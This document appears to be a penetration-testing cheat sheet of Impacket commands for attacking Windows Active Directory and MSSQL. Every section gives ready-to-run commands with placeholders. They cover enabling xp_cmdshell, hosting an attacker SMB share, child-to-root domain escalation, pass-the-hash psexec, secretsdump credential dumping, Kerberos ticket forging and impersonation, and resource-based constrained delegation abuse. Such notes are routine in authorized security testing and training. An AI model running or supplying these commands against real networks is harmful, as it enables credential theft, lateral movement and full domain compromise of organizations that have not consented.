% impacket

# mssqlclient
impacket-mssqlclient -port <RPORT> '<USERNAME>:<PASS>@<RHOST>'
impacket-mssqlclient <RHOST> -k
enable_xp_cmdshell
xp_cmdshell whoami

# smbserver (share on kali)
impacket-smbserver -smb2support evil $PWD

# smbserver (password share on kali)
impacket-smbserver -smb2support -username evil -password evil evil $PWD

# raiseChild (edit /etc/hosts)
sudo vim /etc/hosts
<CHILD_DC_IP> <CHILD_DC_HOSTNAME>.<CHILD_FQDN> 
<ROOT_DC_IP> <ROOT_DC_HOSTNAME>.<ROOT_FQDN> <ROOT_FQDN> 
impacket-raiseChild -hashes <LMHASH>:<NTHASH> <CHILD_DOMAIN>/<CHILD_ADMIN_USER>
impacket-raiseChild <CHILD_DOMAIN>/<CHILD_ADMIN_USER>:'<PASS>'

# psexec
impacket-psexec <DOMAIN>/<ADMIN>@<HOSTNAME>.<ETC_HOST_FQDN> -hashes <HASH>
impacket-psexec <DOMAIN>/<ADMIN>:<PASSWORD>@<HOSTNAME>.<ETC_HOST_FQDN>
impacket-psexec <DOMAIN>/<ADMIN>:'<PASSWORD>'@<IP>

# psexec via env KRB5CCNAME
impacket-psexec -k -no-pass <HOSTNAME>.<ETC_HOST_FQDN> -dc-ip <DC_IP>

# secretsdump
impacket-secretsdump <DOMAIN>/<VICTIM>@<ETC_HOST_FQDN> -hashes <LMHASH>:<NTHASH>
impacket-secretsdump <DOMAIN>/<VICTIM>:<PASS>@<ETC_HOST_FQDN>

# GetADUsers
impacket-GetADUsers -all -k -no-pass -dc-ip <FQDN> <DOMAIN>/<VICTIM>

# GetUserSPNs
impacket-GetUserSPNs -all -k -no-pass -dc-ip <FQDN> <DOMAIN>/<VICTIM>

# lookupsid
impacket-lookupsid <DOMAIN>/<VICTIM>@<HOSTNAME>.<ETC_HOST_FQDN> -hashes <HASH>

# ticketConverter
impacket-ticketConverter <CCACHE_IN> <KIRBI_OUT>
impacket-ticketConverter <KIRBI_IN> <CCACHE_OUT>

# getTGT
impacket-getTGT <DOMAIN>/<VICTIM> -hashes :<NTHASH>
export KRB5CCNAME=<VICTIM>.ccache

# getST (constrained delegation)
impacket-getST -spn mssqlsvc/sql01.corp.com:1433 -impersonate administrator corp.com/iissvc -k -no-pass
impacket-getST -spn <SPN> -impersonate administrator <DOMAIN>/<C_DELEGATION_ACCOUNT> -k -no-pass

# addcomputer (powermad alternative)
impacket-addcomputer -computer-name 'myComputer$' -computer-pass 'h4x' <DOMAIN>/<ACC_WITH_GENERIC_WRITE> -hashes :<NTHASH>
impacket-addcomputer -computer-name 'myComputer$' -computer-pass 'h4x' -dc-ip <DC_IP> <DOMAIN>/<ACC_WITH_GENERIC_WRITE>:<PASS>

# rbcd
impacket-rbcd -action write -delegate-to "<TARGET_COMPUTER_ACC>$" -delegate-from "myComputer$" <DOMAIN>/<ACC_WITH_GENERIC_WRITE> -hashes :<NTHASH>
